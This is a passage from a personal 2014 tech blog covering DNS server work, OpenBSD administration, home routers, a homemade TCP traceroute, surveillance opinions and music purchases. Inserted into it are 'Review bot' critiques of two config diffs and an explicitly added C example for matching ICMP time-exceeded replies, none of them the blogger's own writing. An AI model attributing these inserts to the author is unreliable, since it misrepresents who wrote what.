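        d.hdr.namelen = 11;
        memcpy(d.hdr.name, "centroid.eu", 11);
        d.a.count = 1;
        d.a.addr[0] = 0xC0000201;       /* 192.0.2.1, documentation range */
        printf("full struct: %zu bytes, packed A-only record: %zu bytes\n",
            sizeof(d), domain_packed_size(d.hdr.flags));
        return 0;
}
```

A record that only has an A RR is stored as the header plus one A section; the SOA and CNAME sections cost nothing unless their flag is set.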



Opinion: the destroyers of the 'net

May 31st, 2014

In my view all government agencies, from far and wide, are the destroyers of the Internet. Believe it or not the Internet is built on ethics and values. The government agencies that try to exploit the Internet are in gross violation of these. They are like a cancerous substance in the human body. They must be removed but somehow I think the governments do not see a need to remove them. What this does in end-effect is it destroys the 'net. We're dealing with low-IQ jealous type kindergarten kids here. Because as soon as the government agencies lose interest in the Internet, they'll recommend its removal. What it is they are after is hard to say. However I have a clue. They are after people trying to make a home for their soul. They are after people who make the Internet more beyond the laws and limits of any nation. People have made the Internet a supra-national governed body based on something else that the governments have fathomed. It is based on the rules of logic, and laws as written in the RFC's. The secret services organizations want to destroy this because only they used to have a monopoly on thought and logic.

I'm going to write a small poem about this, here it goes:

Internet my light my saviour
why do you stir such bad behaviour?
For I am being watched with every keystroke
By who other than my government who poke
and peek in my private life away from home
Did you know I live in a dome?
Yes it's made of gold and copper
But you ask me where it is I don't know.
You call me a liar?  It isn't so
For my soul travels along these fibre lights
and while I dream and rest at nights
during day is when I exercise my rights
to use the Internet for a cost and for free
that's what's it about in technology
I demand that governments take heed
to retreat from their creeping deed
And let this 'net be open to my mind
Without them trying to watch my time
And analyse beyond analysation
This poem is for the digital nation!

Well I feel much better now. But the Evil NSA and other government agencies are still about. Let's pray for them!



Have purchased a riddim from iTunes

June 5th, 2014

I have purchased the rest of the drop-it riddim on iTunes. I had one song from this by Chuck Fender already, this completes the purchase.



My 2nd WRT router

June 5th, 2014

I have purchased another WRT router (TP-LINK TL-WR841ND). This router I'm going to set up at my parents' house for freifunk.net. The cost of this router was 28 Euros and is acceptable for a product that gives free Internet and networking to people in range. Eventually we'd like to see a network evolve out of this on the street, neighbourhood, city, state. I can't wait for it to become popular.



Isn't it time for a new computer design?

June 11th, 2014

In my view computers have become too cheap, at under 200 euros a pop. The Von Neumann architecture design has proven its simple design since the 1950's. But is it secure? Why should a device on a firewire, serial or PCI bus have control over the entire memory of a computer? And how would one do the interface if not?

I'd happily trade in a few things from the current computer.

  • rare metals, I'd willingly pay more if my computer used less of these
  • green manufacturing, I'd willingly pay more if my computer used such process
  • secure architecture (shielded keyboard, protected RAM, shielded CPU)
  • quantum elements (quantum cryptography, quantum processing)
  • perhaps manufactured somewhere other than asia?

Anyhow, I think you get the drift. While the current design may be good for first time computer buyers in the 3rd world, the stuff is being flooded in 1st world markets. And we're not learning a bit about computers. Even though my computer was less than that today, I'd argue that a computer in the 2500 to 10,000 euro range is a worthwhile investment, one that can become the next "dream" machine as people only dream of getting it. So I'm saying don't artificially make computers more expensive, as that's only more money in the producer's pocket, no..make it new, make it different, make it the cheapest possible design at a different approach. And then we can possibly compare.



What happens when...

June 11th, 2014

You mix Reggae with RFC's? Out comes RFC-Reggae...



8 days until northern solstice

June 13th, 2014

On Saturday June 21st is northern solstice. For us here that means the longest day of the year. Have fun whatever you're doing.



ap.centroid.eu

June 13th, 2014

This is a notice that ap.centroid.eu will go away in less than 3 months. I'll likely point ap.centroid.eu to americas.centroid.eu when the vps in hong kong is reclaimed. The day this will happen is September 10th.

A brief history on ap.centroid.eu. I rented it from Host Virtual, an American VPS provider (http://vr.org). It resided in the NTT datacenter in Hong Kong and had the main outgoing route go through NTT's links (first to Japan and then on to the US to get to Europe). It was my presence in Asia for 2 years, and it attracted a lot of Asian but also Eurasian traffic. Not as much traffic as I had hoped but in retrospect at least it did not kill me. I was satisfied with the performance and service of this virtual computer. Over the course of the two years I have accumulated about half a TB of traffic, so not much.

So what's next for my network? I'm downsizing the VPS's a bit and in February I'm likely changing my DSL provider in order to get a static IP again. I'll host a master nameserver likely from home then.



Purchased more Reggae

June 20th, 2014

This time the Changes Riddim from Don Corleon Music. I like this riddim, I think a lot of artists in the 9 songs are really great.



Happy Solstice!

June 21st, 2014

Solstice is today. Enjoy!



Cherries 2014

June 23rd, 2014

Last year I had a picture of cherries, so I will have one this year.

These cherries are smaller but more plenty in the tree. Probably due to a cool spring.



A message to the Justice Minister, you're doing it wrong..

June 28th, 2014

The German Justice Minister wants to do harm to Google in order to break the monopoly. Citations here. But it's my opinion that they're going about it wrong. What politics is doing is just adding a tax or tariff on Google which Google will survive, as they are a monopoly. If you want to hurt Google you copy its functions and start-up. Last year, I outlined what needed to be done and how Google positioned itself to be #1. Anyhow Minister, send me a proper email if you want to give me the green light to start a new Google.



Ordered a book

June 28th, 2014

For July I have ordered Evi Nemeth's book UNIX System Administration. May she rest in peace!



Happy Canada Day (tomorrow)!

June 30th, 2014

Some of you may know I have a Canadian history. I even applied for .ca citizenship once but only went to stage 2 of a three stage process and didn't obtain it. Sad for me, Canada is a lovely country. I'm pretty jealous of people who obtained dual citizenships, as they can make both their countries their home. Anyhow. Enjoy the day when people wear red and white (sometimes)!



Why a static IP is best

July 4th, 2014

Happy US Independence day. Recently the news hit in Germany that users of Tor (which is an anonymiser) are tracked down by the NSA and get an "extremist" flag. This just goes to show that dynamic IPs are not quite anonymous, as Tor is much better at anonymizing than a dynamic IP. Anonymous services are dead. I realised this in 1997 when I started working for an ISP, and have always since tried to get a static IP. A static IP doesn't change, you dial in or connect your DSL and it is always on the same IP. This makes you easily identifiable even by laymen. However it also gives you a set of freedoms. Because now you can run services right at home, like a mail server. You know no one is snooping through your mail because you're the only admin of the computer at home. This gives you Independence too strangely (referring to the first sentence in this paragraph). Currently I'm on a dynamic IP but once my contract is up I'm switching to a provider that can give me a static IP again. The reason this didn't happen was that I was in a hurry to get 'net back when and was locked in a 24 months contract.



How to compile xephem from source on OpenBSD

July 06th, 2014

You'll need to install gmake and openmotif from the packages/ports. Then unpack the latest source and apply this patch to GUI/xephem...

$ more /tmp/Makefile.patch
--- Makefile    Sun Jan 20 04:42:02 2013
+++ /tmp/Makefile       Sun Jul  6 18:17:06 2014
@@ -34,9 +34,9 @@
 # some systems now use just /usr/X11 (not /usr/X11R6)
 CC = gcc
 CLDFLAGS = -g
-CFLAGS = $(LIBINC) $(CLDFLAGS) -O2 -Wall -I$(MOTIFI) -I/usr/X11R6/include
-LDFLAGS = $(LIBLNK) $(CLDFLAGS) -L$(MOTIFL) -L/usr/X11R6/lib
-XLIBS = -lXm -lXp -lXt -lXext -lXmu -lX11
+CFLAGS = $(LIBINC) $(CLDFLAGS) -O2 -Wall -I$(MOTIFI) -I/usr/X11R6/include -I/usr/local/include
+LDFLAGS = $(LIBLNK) $(CLDFLAGS) -L$(MOTIFL) -L/usr/X11R6/lib -L/usr/local/lib
+XLIBS = -lXm -lXt -lXext -lXmu -lX11
 LIBS = $(XLIBS) $(LIBLIB) -lm
 
 # for ppc Apple OS X to make universal (i386 and ppc binary), requires
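
Review bot: the XLIBS line drops -lXp with no explanation, and the CFLAGS and LDFLAGS lines hard-code /usr/local/include and /usr/local/lib into a Makefile that, going by its own comments, is shared with other systems. Add a one-line comment above XLIBS saying why -lXp is removed, and put the /usr/local prefix in a variable that can be overridden on the gmake command line so the change stays local to this platform. The local paths are also appended after the /usr/X11R6 ones, so a header or library of the same name under /usr/X11R6 is still found first; confirm that is the intended order for openmotif.
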

Then type gmake and it will build, installing the binary is up to you though.



An old rap song of mine

July 8th, 2014

I was playing around with iMovie on my Mac mini on the weekend and this is what I came up with.

I could have taken any song but I thought I'd try it with something personal. Lyrics by me, music is from the radio recorded from the Urban Space show (old CKLN show).



Purchased more Reggae

July 17th, 2014

I have purchased I-Octane's new album "My Journey" and Jah Cure's album "World Cry". I'm a fan of both and Jah Cure's music finally made my iTunes collection. Happy Listening!



How much space would we have if...

July 19th, 2014

Someone on IRC made me aware of this drawing which shows space in the solar system on rock/ice planets and moons. It intrigued me so I'm sharing the hyperlink. In my opinion we could do with a lot more space than we have on earth now. I personally own no land.



The dark side of IT workers

July 19th, 2014

Many may think of IT work as glorious. And it is, when things work out. But there is a dark side. As IT workers we're often not getting the spiritual, and physical care that humans require. This makes us like zombies and prisoners trapped in our own bodies. Many of us are obese, physically or mentally ill and on the verge of a disaster. The people I know that died are getting more frequent. Just a few days ago a friend died, which prompted me to write something.

The truth is we came from the Dot.com period where it was indoctrinated in us that with hard work we too can be rich and reap the benefits. But the truth is that this only happened to the few. The rest of us upheld networks, created new programs to feed the rich. We're not rich but still are in a mode working like we will be one day and it's killing or disabling us. The problem is that many of us are also addicted to this work and can't think of a life without computers and networks.

I offer no solutions other than pointing out to my readers the problem. Perhaps you too are wondering where you're headed, worried about your shortened future perhaps, or perhaps you are a youngling looking for clues on how to make it into this industry. Don't let me spoil it for you, there is glory too in this industry, but some don't make it, and it's a shame as these were brilliant minds and beautiful inside.

One thing is for sure. This is not sustainable forever.



What to do with Ukraine?

July 19th, 2014

I'm for a UN peacekeeping mission there, as this conflict is spreading internationally.



Backdoored Hardware

July 23rd, 2014

I recently read something in German that said that DE-CIX (as an example) is not guilty of the spying when the hardware is backdoored. However I must say something to this. Around the time the Snowden story appeared, DE-CIX were active in upgrading their infrastructure to Alcatel-Lucent hardware. They could have stopped and said "no we're going with Swedish routers instead". But they didn't. And that to me makes them guilty of a bad decision.

Let me give you an example. When you're a pupil going to school there are at least 2 or 3 alternate routes to the place. Let's pretend you get bullied on your way to school. Why would you take the same route after such an event? A smart person would take the alternate route if they can't make the bully stop. Problem solved. This is not what DE-CIX is doing though.

Had DE-CIX gone with Swedish gear (which may have lesser quality) they could have introduced more parallelism to scale. It would have been a lot more money but in the end they would guarantee us a safe passage.



I interrupted Venus's uptime

July 25th, 2014

My PPPoE router venus's uptime was interrupted today after 85 days uptime. I compiled a new kernel with SMP for it and it happily detected the other core or hyperthread. The below from dmesg:

cpu1 at mainbus0: apid 1 (application processor)
cpu1: Genuine Intel(R) CPU @ 1.60GHz, 1600.00 MHz

Thanks to the OpenBSD developer who fixed the 5.6 install and left a comment in the CVS messages, it made me aware I was only running off 1 processor since I bought venus, and I never really noticed.

The speed of an scp between venus and mercury hasn't changed though, so I didn't gain much more, perhaps a kernel will build faster though.



New Soekris Product coming in Winter 2015

July 25th, 2014

I just saw this at soekris.com's site. A new router with up to 8 Cores and 8 GB RAM. And best of all it has an IPSEC accelerator rated at 10 Gbit/s, which covers all 4 Gbit ports easily.

I'll keep watching this router, as I'm getting low on ports here at home.



My Prayer

July 27th, 2014

I'm not very religious. Yesterday I was lying in bed and listened to 2 hours of music, and I made up a little prayer of all things connected before I went to sleep. It goes a little something like this:

We are all connected
the earth is our home
the cosmos
the earth
blackness
the earth
green blue yellow light
the earth
white light
the earth
I solidify my roots
the earth
all sorrow is gone
the earth
painful events don't mean so much
the earth
our planet will live on
the earth
through the test of time
the earth
it will take us along 
the earth
starshine!
the earth
live the earth love the earth
our divine

In thought this prayer gave me a real home-bound feeling, my body felt very relaxed. Because we aren't just disconnected entities on earth, we are all connected biologically. Us as an invasive species or not.



40 days til end of Moon

August 1st, 2014

My VPS moon.virgostar.net will cease working in 40 days, it will get reclaimed by Host Virtual. In 2 weeks, during my holidays, I'm going to move major services off it such as web and dns. What will remain is just a shell server until it stops working.



Tunnels vs. Submarines

August 2nd, 2014

The tunnels in Gaza I believe are much like the cargo-submarines that Germany had before the breakout of WW1. Germany had created or wanted to create these because certain goods weren't able to get past the British Navy. So my opinion is that Gaza should disarm and make all tunnels available to the Israeli armed forces, so that they can be scuttled. It's too bad about the people living in Gaza that they have terrorists amid their midst and below them in tunnels, many of those people are innocent and victims of war.



My next .ca vacation

August 4th, 2014

Will likely be in summer 2016. I already touched up on the subject with a few friends, that leaves 2015 unplanned. Who knows what I'll be doing but in 2014 I'm coding.



Ordered a book yesterday

August 4th, 2014

I ordered this book: Elemente optischer Netze: Grundlagen... by Volkmar Brueckner. This book is in German and will replace a book I once had in .ca regarding optical networks. I'm looking forward to getting it on the 6th.



nginx + fastcgi stopped working

August 11th, 2014

The jail admin on americas.centroid.eu upgraded all binaries in my jail. While this was nice of him/her it broke everything. So while googling and searching and finding nothing I came across the fix by strings'ing the php-fpm binary. Here is the fix to my config file for fastcgi:

--- /tmp/www.conf.orig  2014-08-11 13:20:25.777728000 +0200
+++ www.conf    2014-08-11 13:19:09.737666000 +0200
@@ -3,6 +3,8 @@
 group = www
 
 listen = /tmp/www.sock
+listen.owner = www
+listen.group = www
 
 pm = dynamic
 pm.max_children = 25
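
Review bot: listen.owner and listen.group are set but listen.mode is not, so the socket's permission bits are left to whatever the installed php-fpm defaults to, and the socket itself stays in /tmp. Add an explicit listen.mode = 0660 next to the two new lines, and consider moving listen to a directory that only the www user and group can enter, so that other local users in the jail can neither connect to nor pre-create /tmp/www.sock.
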

So I hope anyone who has similar problems will be able to come here. However you can't google this since this blog has a robots.txt deny entry. You can keyword search on this blog though.



OpenBSD has a new HTTPD

August 11th, 2014

I've been watching the CVS logs at OpenBSD for a while now where Reyk committed a new httpd at OpenBSD. It's a very secure lightweight server and I think it may be great for me. I'm going to be possibly porting/testing it out on FreeBSD next week during my holidays.



Holidays in 5 days

August 11th, 2014

I go on vacation in 5 days. Looking forward to it. I'll be back at work on September 2nd. What will I be doing? You may have guessed it. I'm going to be programming on Wildcarddnsd. Looking to get one feature working, which will beef security of zone transfers somewhat.



Asylum for Snowden

August 12th, 2014

It was announced last week or so that Edward Snowden would be getting an extension of 3 years permanent residency in Russia. But while he's busy there, there is an ongoing debate whether Snowden should get asylum in Germany. I found this article (in German) that says that in 1951 article 7 of the NATO mandate in Germany the American military have their own parallel judicial and disciplinary track, on top of Germany's. This means that anyone who belongs to the American armed forces is tried in an American court. Now Snowden worked for the NSA. It's debatable whether he is military but he did work with military secrets so he may fall into this jurisdiction. I have been fearing this all along and have written before not to give Snowden asylum here in Germany. Because what would happen is he'd be extradited and then everyone would hate us, and it just needn't be. It's better to be blunt about it and say we have AIDS before everyone gets f*cked! Us, Germany's citizens probably have work ahead to regain sovereignty, but I don't see a chance for that as long as NATO troops still occupy us (as friends/allies of course).

Regarding the occupation the Americans are largely gone in the Ledward and Conn barracks here in Schweinfurt. The "keys" to the castle, so to speak, are going to be turned over around September 30th, 2014. The discontinuation of American forces in Schweinfurt was decided by US president Obama in 2012 or so. I personally am pretty grateful that the US forces are leaving, and pretty grateful for the service that the USA did for our protection in the cold war. So I'm so-so about it. The US are leaving us with a lot of infrastructure and our community college is already reserving the right to use buildings for housing 100 students in October onwards.



Removed moon.virgostar.net from nameservers

August 12th, 2014

I updated 5 out of 6 domains with success. Only centroid.eu had a failure that was unrelated to me taking out moon.virgostar.net from my nameservers. As of today I'm running on only 2 nameservers probably until November/December. On those dates I'll probably get another VPS in the european region and set it up for DNS. Moon.VirgoStar.Net was a nameserver for my domains for 22 months and was always available. The vps will get reclaimed by the hosting provider in less than 30 days so I'm moving everything from it.



Purchased some Reggae

August 13th, 2014

Today on iTunes I purchased Bugle's new album "Anointed". I'm sure this will rock, as I was impressed by the preshow.



New Open Source: bindsync

August 13th, 2014

I have released a program I wrote for a friend into viewvc. It's called bindsync.

bindsync is a program that scans a master named.conf 
file and adds any new zones via the network to the
slave.  No work has been done since 2011 but it's
never been released, now it has.  Enjoy.

It's probably a program that needs a lot of grooming but for people who want to start with something here it is, under a BSD license.



Bought two books

August 14th, 2014

I just bought two books so that I have something to read during the holidays.

  • IPv6 Core Protocols Implementation (Morgan Kaufmann Series in Networking) - Qing, Li
  • IPv6 Advanced Protocols Implementation (Morgan Kaufmann Series in Networking) - Qing, Li

These seem like good books to get. And perhaps I can learn something great out of them.



Why I use Amazon

August 15th, 2014

I used to live in a big city, a metropolis really. It had several Universities and Colleges. With that came literature and bookstores. Then I moved to a small town (ok a small city) with no access to big cities within 2 hours driving distance. I checked out the bookstores here and quickly found out that the types of material that I want to read were either not there, or the quality didn't exist. Now I'm no small town fool. I still require literature for work and for personal interests to grow and flourish. I found Amazon to be the right outlet for me. So all those people who say Amazon is bad and we should go back to supporting bookstores, eat a book, or don't eat a book because you just can't find the book you want to eat in the local bookstores. If I still lived in the big city I'd not need to go to Amazon, it's a trade-off.



Changed DNS servers

August 18th, 2014

I ran into an administrative problem on americas.centroid.eu and needed a recursive as well as an administrative nameserver there. So I did this change:

Before:			After:
wildcarddnsd/americas	bind/americas
nsd/io.solarscale.de	wildcarddnsd/io.solarscale.de

I had to take nsd out in order to keep a wildcarddnsd master. My tests were successful in determining that nothing was lost and that bind slave zones are correct to the wildcarddnsd master.



On Holidays what will I do?

August 19th, 2014

I'm sitting here at home with a few books opened and staring at my own wildcarddnsd code. How am I going to do this? Do what? Well. I decided a long time ago that I'd put TSIG (RFC 2845) support into wildcarddnsd. Just tomorrow will be 1/4 of my vacation over and all I've done is add a few lines of code and printed out RFC 2845 and highlighted it a bit here and there. I do hope I get this done because I have plans to make the 0.9-BETA release with TSIG. I have a vision how I'm going to do the key management inside W but I just need to get over the slump and write code...



The end of Moon (Asia Pacific)

August 20th, 2014

I have stopped the crontab to sync ap.centroid.eu aka Moon. I'll soon be dismantling its web daemon. Here are some stats collected this morning on how much web traffic this host got.

I had that VPS since September 11th 2012, and it'll be reclaimed on September 10th 2014. Host Virtual (http://vr.org) was the VPS provider and they were very nice. I'll write another article regarding that soon.



Futile attempt on a dating service

August 21st, 2014

I cruise dating services once in a while but get turned off when I have to pay. So I put this image of me up in the pictures, and it got removed, oh jeez.

I did this so that it would survive the dating service's auto-scaling as I tried outguess and the message got scrambled. So.. if you're looking to date me why don't you send me an email? I'm single...I'll have to ask you a security question first though so I know where you're from. *laugh* carry on carry on!



Fears of a centralized wifi

August 22nd, 2014

There is a rumour that the governing party in Bavaria (a state of Germany) wants to give the state a wifi network covering most or all of Bavaria. I have thought about this with a shudder. Basically what this means is that the wifi spectrum which is still free and decentralized would get a sort of network of sensors added to it. And fibreoptic networking would make sure that someone in Munich would be able to follow the wifi of anyone without leaving their chair. So, uncloaked, it is a centralized surveillance apparatus. With such a wifi it gives the authorities in Munich a few choices.

  1. They can now follow every single smartphone, everywhere
  2. They can now detect any "Freifunk" nodes which are not encrypted
  3. They can capture encrypted wifi traffic without leaving their chair
  4. They can enforce, by law, an encrypted wifi ap, without leaving their chair

On the other hand it may be really convenient, but who's gonna manage it? The Deutsche Telekom or M-net? And will this mean the end of commercial ISPs?



Bought an Album

August 25th, 2014

I know it's only been 2 weeks since I bought one but I was browsing through Anthony B's album Rasta Love and I just had to buy it. :-)



Holidays coming to an end

August 29th, 2014

I had 2 weeks holidays and I didn't do very much except veg. I did write a bit of code but not the bit of code I wanted to write. It'll have to be written another time.



War in Europe

August 29th, 2014

I think it's fair to say that we have war in Europe. This is the most devastating piece of news, after Chernobyl, I have come across concerning Europe in my life. Now is a good time to stop and listen to the UN.



Purchased Soekris Addons

September 1st, 2014

Happy September! I have purchased a 19" soekris case with internal powersupply and one quad ethernet addon card for my 6501. What I plan to do with this is place venus into my office and uranus into the hallway. I gain 2 ports on both locations that way, and I can possibly put the raspberry pi back in the hallway. Once I get the gear I'll have to wait for the right time to do the operation from venus's (my soekris 6501) old case to the new case. Anyone interested in buying a normal soekris 6501 case (metal) with external power supply should make me an offer preferably if you live in europe.



Donation time again

September 2nd, 2014

After a long break from donations of any kind I activated donations again. I've written a transfer for OpenBSD which I'll bring to the bank this friday. The amount is for 100 Euros. This will be the last for OpenBSD for this year and brings the amount to 300 if I'm not mistaken. It's a little less than the previous years but I'm also facing less income this year due to currency exchange. Hoping for a raise soon. :-)



Venus (computer) has 4 more interfaces

September 7th, 2014

This morning my dad and I transplanted my Soekris 6501 (aka venus) from its small case to a 19" rackmount case and added a lan1841 to it. It now has 8 gigabit interfaces. When I return home I'll have some time to configure the new ports and add my rpi to it. Giving me 3 open ports in the hallway and 2 open ports in my office (by taking the rpi out). I'm very happy.



Moon finally gone

September 10th, 2014

The VPS in Hong Kong is gone. Here is the last message I saw from it.

You have new mail in /var/mail/pjp
[pjp@76er ~]$ Write failed: Broken pipe

That was from 76er.virgostar.net, one of its jails.

I'd like to thank the people of Hong Kong, the city of Hong Kong, NTT and Host Virtual (vr.org) for making this VPS possible for me for 20 dollars a month. Hong Kong has good infrastructure IMO, especially near the HKIX internet exchange, although I can only guess about it really. It was my pleasure staying there for 2 years. As they would say in France, a bientot!

I'll now remove the mentions of moon.virgostar.net from my DNS.



The Enforcers of the Internet?

September 12th, 2014

Some government body in Bavaria is writing warnings and threats to Internet companies that don't use STARTTLS in their mail servers. I don't think it's right to threaten Internet operators with fines when they don't encrypt. Instead they should give incentives to Internet companies to start encrypting. Pretend you run your own mail server that doesn't have crypto built in... I think these are the wrong methods the state is using just to "protect" its citizens.



Purchased some Reggae

September 17th, 2014

I have purchased the downtown riddim from iTunes. A long favourite of mine on YouTube, I finally have it on my iPod now.



Equinox in three days

September 20th, 2014

Equinox is in three days! At equinox the earth is exactly perpendicular if you were to draw a cross, with lines between the north and the south pole, and the equator and the sun. After equinox as this is the southward equinox favouring the direction of the tropic of capricorn, the northern hemisphere will fall into autumn, and countries north of the equator will have longer nights than days. The sun at high noon will continue to dip everyday as it has been since the June solstice, until the December solstice at which point it will start to rise again. Isn't the earth wonderful? I love this!



OpenBSD blocked at the routers?

September 22nd, 2014

When I spend my weekends at my parents' I usually do all network things as usual on my netbook. Just that my parents have a different provider (DTAG, aka Deutsche Telekom). Here is a traceroute from my parents' house to my VPS io.solarscale.de:

                                       Packets               Pings              
 Host                                Loss%   Snt   Last   Avg  Best  Wrst StDev 
 1. fritz.box                         0.0%    28    7.5   7.5   6.1   8.5   0.3 
 2. 217.0.116.43                      3.7%    27   60.0  56.3  53.1  70.1   3.3 
 3. 217.0.67.10                       0.0%    27   57.5  58.2  51.7  73.2   3.9 
 4. f-ed4-i.F.DE.NET.DTAG.DE          0.0%    27   60.9  63.2  58.2  77.5   5.1 
 5. 62.157.251.34                     3.7%    27   61.0  60.1  57.3  62.1   1.0 
 6. core4.hetzner.de                  7.4%    27   61.0  60.6  58.0  64.3   1.2 
 7. core21.hetzner.de                 3.8%    27   64.6  65.6  61.6  79.8   3.3 
 8. juniper3.rz10.hetzner.de          0.0%    27   67.9  66.1  61.1  76.7   3.2 
 9. hos-tr1.ms-ex3k1.rz13.hetzner.de  7.4%    27   66.4  66.3  63.2  73.1   1.7 
10. io.solarscale.de                  0.0%    27   64.9  64.7  61.9  67.6   1.1 

The return route looks like this:

traceroute to 84.170.172.239 (84.170.172.239), 64 hops max, 52 byte packets
 1  static.65.5.40.188.clients.your-server.de (188.40.5.65)  0.914 ms  1.288 ms  0.909 ms
 2  hos-tr2.juniper3.rz10.hetzner.de (213.239.236.81)  0.319 ms  0.372 ms  0.291 ms
 3  core22.hetzner.de (213.239.245.141)  0.337 ms  0.334 ms
    core21.hetzner.de (213.239.245.101)  0.333 ms
 4  core4.hetzner.de (213.239.245.18)  4.976 ms  4.952 ms  4.961 ms
 5  juniper4.ffm.hetzner.de (213.239.245.1)  5.054 ms  5.036 ms  5.034 ms
 6  62.157.251.33 (62.157.251.33)  5.098 ms
    80.157.128.233 (80.157.128.233)  5.102 ms  5.059 ms
 7  f-sb1-i.F.DE.NET.DTAG.DE (62.154.14.137)  11.048 ms  13.225 ms  11.980 ms
 8  wue-ea1-i.WUE.DE.NET.DTAG.DE (62.154.68.73)  12.899 ms  12.667 ms  13.767 ms
 9  wue-sc2-i.WUE.DE.NET.DTAG.DE (62.154.4.114)  11.224 ms
    217.0.67.5 (217.0.67.5)  11.609 ms  11.867 ms
10  p54AAACEF.dip0.t-ipconnect.de (84.170.172.239)  56.456 ms !X  56.265 ms 

Now then I connected an SSH and ran tmux. Switching windows causes larger SSH packets and I noticed that they get re-transmitted, when dumping on the outgoing interface on io.solarscale.de (re0). Here is what they look like:

Notice on packets #378 through #388 there are three retransmissions of a 966 byte length packet. This was captured on io.solarscale.de. On #390 which was captured on fritz!box's 192.168.178.1 interface it's sent out to the netbook in question. The fritz!box does not receive the three retransmissions on its PPPoE interface as the next screenshot shows of its PPPoE packet dump:

Notice on packet #175 the 984 byte length packet arrives. Why is it 8 bytes larger? Because of the nature of PPPoE. Notice in the #175 vicinity no retransmissions make it to the PPPoE interface. From this I can deduce that it is not the Fritz!Box router.

Now then. It gets worse. A Linux box on my parents' LAN has absolutely no problems with SSH on io.solarscale.de. It only affects my OpenBSD netbook.

Could there be something such as a TCP OS Fingerprinting firewall that uses discrimination against OpenBSD TCP stacks? It would need to be done on a flow basis if such a thing exists.

This is really annoying me as I'm inviting laughs and denial that anything is wrong.



Donated $5 to FreeBSD Foundation

September 24th, 2014

I was feeling a bit down and wanted to spend money. But not too much money either. Five dollars isn't gonna kill me. So I donated it to the FreeBSD foundation. Go Open Source!



Wildcarddnsd Linux now relies on LibreSSL

September 28th, 2014

I have made wildcarddnsd's linux port rely on LibreSSL. This was not easy because libressl does not exist in ubuntu or raspbian (the flavours I use). So what I did was make it rely on libressl 2.0.5, and it extracts .o files from the .a archive with ar, for functions that it needs. This seems to go well. Just costs a bit of compile time. Roughly one hour on raspberry pi to compile libressl 2.0.5.

I also checked all architectures except NetBSD whether they compile so that I can release wildcarddnsd 0.9.0 in mid-November, as I don't know if I'll have much time in October to work on it.



Two TCP traceroutes

September 30th, 2014

I have written two programs that do a tcp traceroute to a remote IP. I plan on finding the culprit at DTAG that gives me packet loss to my openbsd laptop from the host io.solarscale.de. I wrote on it most of yesterday and got it working somehow. Here is the source code for the server traceroute and here is the source code for the client traceroute. The server gets connected upon with telnet and it will spit back some data while tracing on its side (it doesn't fork), the client will connect to the echo port or discard port whichever one it finds first and will do a traceroute. Here is a small demonstration of how the server tcp traceroute works:

root@galileo:/home/pjp/mytcptraced # ./mytcptraced 0.0.0.0
now sending from port 88 to port 55233, sending a few lines of test
sending testline 0 length 4
now starting the trace...
1 188.40.5.65           1292    1304
2 213.239.236.81        442     514
3 213.239.245.101       527     610
4 213.239.245.14        5129    5136
5 213.239.245.1         5223    5230
6 80.81.193.7           6095    6103
7 188.174.202.201       12422   13179
8 188.174.202.201       11944   12671
9 188.174.202.201       14382   14854
10 

What's so cool about this is that it unearths routers behind NAT, as seen with 188.174.202.201 the last hop. This is my home address at m-net. Unfortunately it can't unearth the RFC 1918 addresses due to some pretty good NAT on ICMP timex messages, but knowing that this network goes deep is interesting too. Anyhow enjoy the code, and play if you wish.
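How a TCP traceroute like the one above ties each ICMP time-exceeded ("timex") reply to the connection it is tracing, as an added C example (not the author's mytcptraced source): the reply quotes the expired packet's IP header plus its first 8 bytes, which for TCP hold both ports. The sample packet and its 192.0.2.1 and 198.51.100.7 addresses are constructed, the function and struct names are hypothetical, and ports 88 and 55233 are taken from the session output above.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* The traced TCP connection as the tracer sent it (host byte order). */
struct flow {
    uint32_t src_ip, dst_ip;
    uint16_t src_port, dst_port;
};

static uint16_t rd16(const unsigned char *p)
{
    return (uint16_t)((p[0] << 8) | p[1]);
}

static uint32_t rd32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/*
 * icmp points at the ICMP header of a received message (outer IP header
 * already stripped). Returns 1 if it is a time-exceeded-in-transit reply
 * quoting a segment of flow f, 0 if it is some other or foreign message,
 * -1 if it is too short or malformed to decide.
 */
int timex_matches_flow(const unsigned char *icmp, size_t len,
                       const struct flow *f)
{
    const unsigned char *ip, *tcp;
    size_t ihl;

    if (len < 8)
        return -1;
    if (icmp[0] != 11 || icmp[1] != 0)      /* type 11, code 0 */
        return 0;
    ip = icmp + 8;                          /* quoted original IP header */
    len -= 8;
    if (len < 20 || (ip[0] >> 4) != 4)
        return -1;
    ihl = (size_t)(ip[0] & 0x0f) * 4;       /* header may carry options */
    if (ihl < 20 || len < ihl + 8)          /* RFC 792: header + 8 bytes */
        return -1;
    if (ip[9] != 6)                         /* quoted protocol is not TCP */
        return 0;
    tcp = ip + ihl;                         /* ports are the first 4 bytes */
    return rd32(ip + 12) == f->src_ip && rd32(ip + 16) == f->dst_ip &&
           rd16(tcp) == f->src_port && rd16(tcp + 2) == f->dst_port;
}

/* Constructed sample: ICMP header, quoted IPv4 header (TTL expired), and
 * the first 8 bytes of the TCP segment. Checksums are left as zero. */
const unsigned char sample_timex[36] = {
    0x0b, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,   /* ICMP type 11 code 0 */
    0x45, 0x00, 0x00, 0x34, 0x12, 0x34, 0x40, 0x00,   /* IPv4, IHL 5, len 52 */
    0x01, 0x06, 0x00, 0x00,                           /* TTL 1, proto 6 (TCP) */
    0xc0, 0x00, 0x02, 0x01,                           /* src 192.0.2.1 */
    0xc6, 0x33, 0x64, 0x07,                           /* dst 198.51.100.7 */
    0x00, 0x58, 0xd7, 0xc1,                           /* ports 88 -> 55233 */
    0x00, 0x00, 0x00, 0x01                            /* TCP sequence number */
};

const struct flow sample_flow = { 0xc0000201u, 0xc6336407u, 88, 55233 };

int main(void)
{
    printf("match: %d\n",
           timex_matches_flow(sample_timex, sizeof(sample_timex), &sample_flow));
    return 0;
}
```

The hop address itself is the source address of the outer IP header that carried the ICMP message; this check only decides whether the reply belongs to the traced connection.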



Pre-Ordered OpenBSD 5.6

September 30th, 2014

I have pre-ordered this from OpenBSDStore.COM, which is the old openbsdeurope.com website. Had some problems maneuvering through their site at first but after an email and assurances that everything was alright from them, I managed to do my pre-order. Looking forward to having the three disks of freedom in my hands!



Tried the firechat app

October 3rd, 2014

